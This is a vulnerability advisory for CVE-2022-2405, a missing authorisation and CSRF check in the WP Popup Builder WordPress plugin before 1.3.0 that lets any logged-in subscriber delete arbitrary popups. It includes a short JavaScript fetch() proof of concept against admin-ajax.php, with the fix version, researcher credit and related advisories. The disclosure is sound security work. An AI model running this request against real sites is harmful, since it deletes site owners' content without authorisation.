WP Popup Builder < 1.3.0 – Subscriber+ Arbitrary Popup Deletion | CVE 2022-2405 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF check in an AJAX action, allowing any authenticated users, such as subscribers to delete arbitrary Popup

Proof of Concept

fetch('/wordpress/wp-admin/admin-ajax.php?action=delete_popup', {
  method: 'POST',headers:{"content-type":"application/x-www-form-urlencoded"},
  body: "bid=1",
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

wp-popup-builder

Fixed in 1.3.0

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Submitter twitter

Verified

Yes

WPVDB ID

50037028-2790-47ee-aae1-faf0724eb917

Timeline

Publicly Published

2022-09-05 (about 1 years ago)

Added

2022-09-05 (about 1 years ago)

Last Updated

2022-09-30 (about 1 years ago)

Other

Published

Title

Published

2023-03-17

Title

SEO by Squirrly SEO < 12.1.21 - Missing Authorization

Published

2023-12-21

Title

EazyDocs < 2.3.6 - Subscriber+ Arbitrary Posts Deletion and Document Management

Published

2024-01-05

Title

LightStart < 2.6.9 - Subscriber+ Page design Update

Published

2024-04-11

Title

Advanced Post Block – Display Posts, Pages, or Custom Posts on Your Page <= 1.13.1 - Missing Authorization to Information Disclosure

Published

2024-02-12

Title

MoveTo <= 6.2 - Missing Authorization to Unauthenticated Options Update